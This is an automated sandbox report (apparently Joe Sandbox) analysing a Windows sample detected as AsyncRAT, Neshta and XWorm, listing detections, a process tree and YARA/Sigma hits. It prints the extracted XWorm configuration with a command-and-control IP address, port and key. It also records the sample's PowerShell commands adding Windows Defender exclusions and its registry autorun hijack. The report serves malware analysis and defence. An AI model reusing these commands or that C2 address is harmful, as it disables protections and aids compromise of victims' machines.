Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
x.exe

Overview

General Information

Sample name:x.exe
Analysis ID:1465840
MD5:d27e7c560c09eb318c80cab58baea1b2
SHA1:354342a3b26579d2eb2a0db253ca6505629b3a48
SHA256:6df33c856858c03f62d5a67a7bc69499db91a1405e67b83907dcabfe9bd31d40
Infos:

Detection

AsyncRAT, Neshta, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AsyncRAT
Yara detected Neshta
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Creates an undocumented autostart registry key
Drops PE files with a suspicious file extension
Drops executable to a common third party application directory
Drops executables to the windows directory (C:\Windows) and starts them
Drops or copies MsMpEng.exe (Windows Defender, likely to bypass HIPS)
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample is not signed and drops a device driver
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates driver files
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Classes Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Use Short Name Path in Command Line
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • x.exe (PID: 1292 cmdline: "C:\Users\user\Desktop\x.exe" MD5: D27E7C560C09EB318C80CAB58BAEA1B2)
    • x.exe (PID: 5336 cmdline: "C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe" MD5: 9F4FFCEB9E7905107492815B7EBFDC13)
      • svchost.com (PID: 5076 cmdline: "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe' MD5: E2758E90753E604AB1857653E10B35EE)
        • powershell.exe (PID: 4132 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 5888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • svchost.com (PID: 8176 cmdline: "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x.exe' MD5: E2758E90753E604AB1857653E10B35EE)
        • powershell.exe (PID: 2848 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 1196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • svchost.com (PID: 5296 cmdline: "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update Checker (64 bit).exe' MD5: E2758E90753E604AB1857653E10B35EE)
        • powershell.exe (PID: 4516 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update Checker (64 bit).exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • svchost.com (PID: 5100 cmdline: "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update Checker (64 bit).exe' MD5: E2758E90753E604AB1857653E10B35EE)
        • powershell.exe (PID: 2196 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update Checker (64 bit).exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 1316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
NameDescriptionAttributionBlogpost URLsLink
neshtaNeshta is a 2005 Belarusian file infector virus written in Delphi. The name of the virus comes from the Belarusian word "nesta" meaning "something."No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.neshta
NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["45.141.26.232"], "Port": "6666", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
x.exeJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
    x.exeJoeSecurity_XWormYara detected XWormJoe Security
      x.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x137d9:$s6: VirtualBox
      • 0x13737:$s8: Win32_ComputerSystem
      • 0x14187:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x14224:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x14339:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x13e35:$cnc4: POST / HTTP/1.1

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\ProgramData\Java Update Checker (64 bit).exeJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
        C:\ProgramData\Java Update Checker (64 bit).exeJoeSecurity_XWormYara detected XWormJoe Security
          C:\ProgramData\Java Update Checker (64 bit).exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
            C:\ProgramData\Java Update Checker (64 bit).exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x81d9:$s6: VirtualBox
            • 0x8137:$s8: Win32_ComputerSystem
            • 0x8b87:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x8c24:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x8d39:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x8835:$cnc4: POST / HTTP/1.1
            C:\Users\user\AppData\Local\Temp\3582-490\x.exeJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
              Click to see the 3 entries

              Memory Dumps

              SourceRuleDescriptionAuthorStrings
              00000002.00000002.2471076189.00000000030CE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                00000002.00000002.2471076189.00000000030CE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                  00000002.00000002.2471076189.00000000030CE000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                  • 0x9a19:$s6: VirtualBox
                  • 0x9977:$s8: Win32_ComputerSystem
                  • 0xa3c7:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                  • 0xa464:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                  • 0xa579:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                  • 0xa075:$cnc4: POST / HTTP/1.1
                  00000002.00000000.1208996439.0000000000DC2000.00000002.00000001.01000000.00000005.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                    00000002.00000000.1208996439.0000000000DC2000.00000002.00000001.01000000.00000005.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                      Click to see the 6 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      2.0.x.exe.dc0000.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                        2.0.x.exe.dc0000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                          2.0.x.exe.dc0000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                            2.0.x.exe.dc0000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                            • 0x81d9:$s6: VirtualBox
                            • 0x8137:$s8: Win32_ComputerSystem
                            • 0x8b87:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                            • 0x8c24:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                            • 0x8d39:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                            • 0x8835:$cnc4: POST / HTTP/1.1
                            2.2.x.exe.30cf840.1.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                              Click to see the 6 entries

                              Sigma Signatures

                              System Summary

                              barindex
                              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe', CommandLine: "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\svchost.com, NewProcessName: C:\Windows\svchost.com, OriginalFileName: C:\Windows\svchost.com, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\3582-490\x.exe, ParentProcessId: 5336, ParentProcessName: x.exe, ProcessCommandLine: "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe', ProcessId: 5076, ProcessName: svchost.com
                              Sigma detected: Script Interpreter Execution From Suspicious Folder
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe', CommandLine: "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\svchost.com, NewProcessName: C:\Windows\svchost.com, OriginalFileName: C:\Windows\svchost.com, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\3582-490\x.exe, ParentProcessId: 5336, ParentProcessName: x.exe, ProcessCommandLine: "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe', ProcessId: 5076, ProcessName: svchost.com
                              Sigma detected: Suspicious Script Execution From Temp Folder
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe', ParentImage: C:\Windows\svchost.com, ParentProcessId: 5076, ParentProcessName: svchost.com, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe', ProcessId: 4132, ProcessName: powershell.exe
                              Sigma detected: Change PowerShell Policies to an Insecure Level
                              Source: Process startedAuthor: frack113: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe', ParentImage: C:\Windows\svchost.com, ParentProcessId: 5076, ParentProcessName: svchost.com, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe', ProcessId: 4132, ProcessName: powershell.exe
                              Sigma detected: Classes Autorun Keys Modification
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\svchost.com "%1" %*, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\x.exe, ProcessId: 1292, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\(Default)
                              Sigma detected: Powershell Defender Exclusion
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe', CommandLine: "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\svchost.com, NewProcessName: C:\Windows\svchost.com, OriginalFileName: C:\Windows\svchost.com, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\3582-490\x.exe, ParentProcessId: 5336, ParentProcessName: x.exe, ProcessCommandLine: "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe', ProcessId: 5076, ProcessName: svchost.com
                              Sigma detected: Startup Folder File Write
                              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\3582-490\x.exe, ProcessId: 5336, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update Checker (64 bit).lnk
                              Sigma detected: Use Short Name Path in Command Line
                              Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\3582-490\x.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\3582-490\x.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\3582-490\x.exe, ParentCommandLine: "C:\Users\user\Desktop\x.exe", ParentImage: C:\Users\user\Desktop\x.exe, ParentProcessId: 1292, ParentProcessName: x.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe" , ProcessId: 5336, ProcessName: x.exe
                              Sigma detected: Non Interactive PowerShell Process Spawned
                              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe', ParentImage: C:\Windows\svchost.com, ParentProcessId: 5076, ParentProcessName: svchost.com, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe', ProcessId: 4132, ProcessName: powershell.exe

                              Snort Signatures

                              No Snort rule has matched

                              Joe Sandbox Signatures

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Antivirus / Scanner detection for submitted sample
                              Source: x.exeAvira: detected
                              Antivirus detection for dropped file
                              Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exeAvira: detection malicious, Label: W32/Delf.I
                              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeAvira: detection malicious, Label: W32/Delf.I
                              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeAvira: detection malicious, Label: W32/Delf.I
                              Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeAvira: detection malicious, Label: W32/Delf.I
                              Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exeAvira: detection malicious, Label: W32/Delf.I
                              Source: C:\Program Files (x86)\AutoIt3\Uninstall.exeAvira: detection malicious, Label: W32/Delf.I
                              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeAvira: detection malicious, Label: W32/Delf.I
                              Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeAvira: detection malicious, Label: W32/Delf.I
                              Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeAvira: detection malicious, Label: W32/Delf.I
                              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeAvira: detection malicious, Label: W32/Delf.I
                              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeAvira: detection malicious, Label: W32/Delf.I
                              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeAvira: detection malicious, Label: W32/Delf.I
                              Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeAvira: detection malicious, Label: W32/Delf.I
                              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeAvira: detection malicious, Label: W32/Delf.I
                              Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Delf.I
                              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeAvira: detection malicious, Label: W32/Delf.I
                              Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeAvira: detection malicious, Label: W32/Delf.I
                              Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeAvira: detection malicious, Label: W32/Delf.I
                              Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeAvira: detection malicious, Label: W32/Delf.I
                              Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeAvira: detection malicious, Label: W32/Delf.I
                              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeAvira: detection malicious, Label: W32/Delf.I
                              Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeAvira: detection malicious, Label: W32/Delf.I
                              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeAvira: detection malicious, Label: W32/Delf.I
                              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeAvira: detection malicious, Label: W32/Delf.I
                              Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeAvira: detection malicious, Label: W32/Delf.I
                              Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exeAvira: detection malicious, Label: W32/Delf.I
                              Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXEAvira: detection malicious, Label: W32/Delf.I
                              Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeAvira: detection malicious, Label: W32/Delf.I
                              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeAvira: detection malicious, Label: W32/Delf.I
                              Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeAvira: detection malicious, Label: W32/Delf.I
                              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeAvira: detection malicious, Label: W32/Delf.I
                              Found malware configuration
                              Source: 00000002.00000002.2471076189.00000000030CE000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["45.141.26.232"], "Port": "6666", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
                              Multi AV Scanner detection for dropped file
                              Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeReversingLabs: Detection: 97%
                              Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeReversingLabs: Detection: 93%
                              Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeVirustotal: Detection: 83%Perma Link
                              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeReversingLabs: Detection: 100%
                              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeVirustotal: Detection: 88%Perma Link
                              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeReversingLabs: Detection: 100%
                              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeVirustotal: Detection: 90%Perma Link
                              Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeReversingLabs: Detection: 100%
                              Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeVirustotal: Detection: 90%Perma Link
                              Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeReversingLabs: Detection: 100%
                              Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeVirustotal: Detection: 93%Perma Link
                              Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeReversingLabs: Detection: 100%
                              Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exeReversingLabs: Detection: 100%
                              Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exeVirustotal: Detection: 88%Perma Link
                              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeReversingLabs: Detection: 100%
                              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeVirustotal: Detection: 88%Perma Link
                              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeReversingLabs: Detection: 100%
                              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeReversingLabs: Detection: 100%
                              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeReversingLabs: Detection: 100%
                              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeReversingLabs: Detection: 100%
                              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeReversingLabs: Detection: 100%
                              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeReversingLabs: Detection: 100%
                              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeReversingLabs: Detection: 100%
                              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeReversingLabs: Detection: 100%
                              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeReversingLabs: Detection: 100%
                              Multi AV Scanner detection for submitted file
                              Source: x.exeReversingLabs: Detection: 97%
                              Source: x.exeVirustotal: Detection: 93%Perma Link
                              AI detected suspicious sample
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                              Machine Learning detection for dropped file
